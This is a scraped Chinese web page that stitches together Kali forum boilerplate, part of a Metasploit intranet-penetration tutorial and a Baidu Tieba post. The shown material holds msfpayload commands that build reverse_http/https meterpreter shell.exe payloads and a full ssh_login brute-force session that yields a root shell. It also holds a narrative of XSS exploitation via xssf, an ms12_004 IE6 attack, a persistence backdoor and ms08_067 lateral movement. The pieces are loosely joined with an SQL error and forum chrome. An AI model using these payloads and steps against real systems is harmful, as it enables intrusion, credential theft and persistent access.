如何使用metasploit 内网扫描进行内网渗透详细过程

仅允许metasploit相关内容
Metasploit两千人群:
论坛是RAPID7官方授权代理商,购买请联系:
- [阅读权限 10]- [回帖奖励
站长推荐 /1
加入VIP,领取Kali论坛定制的首款纪念版T恤,数量有限,领完即止!
免责声明:Kali linux中文网所发布的一切教程文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。
Powered by当前位置:&>&&>&
如何使用metasploit进行内网渗透详细过程(2)
发布时间:
来源:服务器之家
reverse_http
msfpayload&windows/meterpreter/reverse_http&LHOST=&Your&IP&Address&&LPORT=&Your&Port&to&Connect&On&&X&&&shell.exe
reverse_https
msfpayload&windows/meterpreter/reverse_https&LHOST=&Your&IP&Address&&LPORT=&Your&Port&to&Connect&On&&X&&&shell.exe
Login privilege
在获得一些登陆权限之后获得meterpreter shell的方法。
模块路径:auxiliary/scanner/ssh/ssh_login
msf&exploit(sshexec)&&&use&auxiliary/scanner/ssh/ssh_login
msf&auxiliary(ssh_login)&&&show&options
Module&options&(auxiliary/scanner/ssh/ssh_login):
&&&Name&&&&&&&&&&&&&&Current&Setting&&Required&&Description
&&&----&&&&&&&&&&&&&&---------------&&--------&&-----------
&&&BLANK_PASSWORDS&&&true&&&&&&&&&&&&&no&&&&&&&&Try&blank&passwords&for&all&users
&&&BRUTEFORCE_SPEED&&5&&&&&&&&&&&&&&&&yes&&&&&&&How&fast&to&bruteforce,&from&0&to&5
&&&DB_ALL_CREDS&&&&&&false&&&&&&&&&&&&no&&&&&&&&Try&each&user/password&couple&stored&in&the&current&database
&&&DB_ALL_PASS&&&&&&&false&&&&&&&&&&&&no&&&&&&&&Add&all&passwords&in&the&current&database&to&the&list
&&&DB_ALL_USERS&&&&&&false&&&&&&&&&&&&no&&&&&&&&Add&all&users&in&the&current&database&to&the&list
&&&PASSWORD&&&&&&&&&&&&&&&&&&&&&&&&&&&no&&&&&&&&A&specific&password&to&authenticate&with
&&&PASS_FILE&&&&&&&&&&&&&&&&&&&&&&&&&&no&&&&&&&&File&containing&passwords,&one&per&line
&&&RHOSTS&&&&&&&&&&&&&&&&&&&&&&&&&&&&&yes&&&&&&&The&target&address&range&or&CIDR&identifier
&&&RPORT&&&&&&&&&&&&&22&&&&&&&&&&&&&&&yes&&&&&&&The&target&port
&&&STOP_ON_SUCCESS&&&false&&&&&&&&&&&&yes&&&&&&&Stop&guessing&when&a&credential&works&for&a&host
&&&THREADS&&&&&&&&&&&1&&&&&&&&&&&&&&&&yes&&&&&&&The&number&of&concurrent&threads
&&&USERNAME&&&&&&&&&&&&&&&&&&&&&&&&&&&no&&&&&&&&A&specific&username&to&authenticate&as
&&&USERPASS_FILE&&&&&&&&&&&&&&&&&&&&&&no&&&&&&&&File&containing&users&and&passwords&separated&by&space,&one&pair&per&line
&&&USER_AS_PASS&&&&&&true&&&&&&&&&&&&&no&&&&&&&&Try&the&username&as&the&password&for&all&users
&&&USER_FILE&&&&&&&&&&&&&&&&&&&&&&&&&&no&&&&&&&&File&containing&usernames,&one&per&line
&&&VERBOSE&&&&&&&&&&&true&&&&&&&&&&&&&yes&&&&&&&Whether&to&print&output&for&all&attempts
msf&auxiliary(ssh_login)&&&set&RHOSTS&192.168.1.104
RHOSTS&=&&192.168.1.104
msf&auxiliary(ssh_login)&&&set&USERNAME&root
USERNAME&=&&root
msf&auxiliary(ssh_login)&&&set&PASS
set&PASSWORD&&&set&PASS_FILE
msf&auxiliary(ssh_login)&&&set&PASSWORD&toor
PASSWORD&=&&toor
msf&auxiliary(ssh_login)&&&exploit
[*]&192.168.1.104:22&SSH&-&Starting&bruteforce
[*]&192.168.1.104:22&SSH&-&[1/3]&-&Trying:&username:&'root'&with&password:&''
[-]&192.168.1.104:22&SSH&-&[1/3]&-&Failed:&'root':''
[*]&192.168.1.104:22&SSH&-&[2/3]&-&Trying:&username:&'root'&with&password:&'root'
[-]&192.168.1.104:22&SSH&-&[2/3]&-&Failed:&'root':'root'
[*]&192.168.1.104:22&SSH&-&[3/3]&-&Trying:&username:&'root'&with&password:&'toor'
[*]&Command&shell&session&4&opened&(192.168.1.105:54562&-&&192.168.1.104:22)&at&&22:55:54&+0800
[+]&192.168.1.104:22&SSH&-&[3/3]&-&Success:&'root':'toor'&'uid=0(root)&gid=0(root)&groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)&context=system_u:system_r:unconfined_t:SystemLow-SystemHigh&Linux&localhost.localdomain&2.6.18-164.el5&#1&SMP&Thu&Sep&3&03:33:56&EDT&&i686&i386&GNU/Linux&'
[*]&Scanned&1&of&1&hosts&(100%&complete)
[*]&Auxiliary&module&execution&completed
msf&auxiliary(ssh_login)&&&sessions
Active&sessions
===============
&&Id&&Type&&&&&&&&&Information&&&&&&&&&&&&&&&&&&&&&&&Connection
&&--&&----&&&&&&&&&-----------&&&&&&&&&&&&&&&&&&&&&&&----------
&&4&&&shell&linux&&SSH&root:toor&(192.168.1.104:22)&&192.168.1.105:54562&-&&192.168.1.104:22&(192.168.1.104)
msf&auxiliary(ssh_login)&&
&&&&&2&&&&&
SQL Error: select * from ***_***_news where id in ()
Copyright © . 版权所有【图片】XSS漏洞利用 Metasploit渗透 内网拓展(转至SSS论坛)_渗透吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名:今日本吧第个签到,本吧因你更精彩,明天继续来努力!
本吧签到人数:0成为超级会员,使用一键签到本月漏签0次!成为超级会员,赠送8张补签卡连续签到:天&&累计签到:天超级会员单次开通12个月以上,赠送连续签到卡3张
关注:43,009贴子:
XSS漏洞利用 Metasploit渗透 内网拓展(转至SSS论坛)收藏
来源:来自uioi的投稿获取邀请码(首发SSS论坛,转载请注明出处,感激不尽)编辑:95zz目的:学术研究工具:漏洞利用:metasploit,xssf信息搜集:xssf,nmap,arpscanner其他:metepreter利用漏洞:ms08_067,ms12_004实验步骤:网站截屏简单测试可发现登陆认证未对用户输入过滤,于是构造请求,跳过认证打开metasploit,加载xssf模块查看配置信息写一个包涵注入网址的js脚本(本人新手,缺乏经验,随意为之,望大神批评指正)输入xssf_victims查看已经监控到的访问注射链接的电脑,(10.10.10.128本机ip因为发表后执行了一次)模拟内网xp电脑访问该网页我们回到kali下看看目前的注射记录(确实搞到了xp的信息,ip地址是网关服务器的)输入xssf_information 2查看具体信息由于用户使用的是ie6,有一个想法通过再次使用跨站漏洞将含恶意链接的网址注入执行,这次使用一个针对ie6的漏洞,这里经过多次尝试使用ms12_004参数配置完成后exploit,这里略去具体参数,当时由于尝试太多,很多端口已经使用了方法同上模拟xp访问后,kali下注入成功,建立连接然后(攻击者可以先将 恶意进程迁移到同explorer这类稳定的进程后再操作)为了保持长期访问,留下后门(使用persistence这个模块,-X表示开机启动,-p -r 为监听机的ip和监听端口)在攻击机上打开后门监听(现在我们可以随时访问靶机了,我们已经可以用metasploit集成的一些信息窃取的工具对靶机的文件信息软件信息一类的进行窃取了)现在利用已控制的电脑,对内网其他电脑进行渗透(跳板机ip为192.168.10.128)进行arp信息扫描,分析得到另一主机ip 为192.168.10.129得到内网路由信息查看会话,通过会话11添加路由利用nmap进行扫描,得到129机相关端口信息,分析。。。用ms08_067进行渗透本帖隐藏的内容成功进入图片23.png (90.3 KB, 下载次数: 0)下载附件
保存到相册昨天 23:35 上传总结:大概思路就是通过开放网站的漏洞成功进入一台内网机,再以内网机为跳板再攻击其他内网机。(思路清晰、过程较为完整。故通过)
95zz是哪个大神,好牛逼啊
Msf原来可以这么玩
95zz是哪个大神,好牛逼啊
厉害厉害厉害厉害厉害厉害厉害厉害厉害厉害
为什么我在Kali里登dvssc出来的是别的网页,不是这个
95zz是哪个大神,好牛逼啊
应用吧活动,
登录百度帐号推荐应用

我要回帖

更多关于 metasploit 内网代理 的文章

 

随机推荐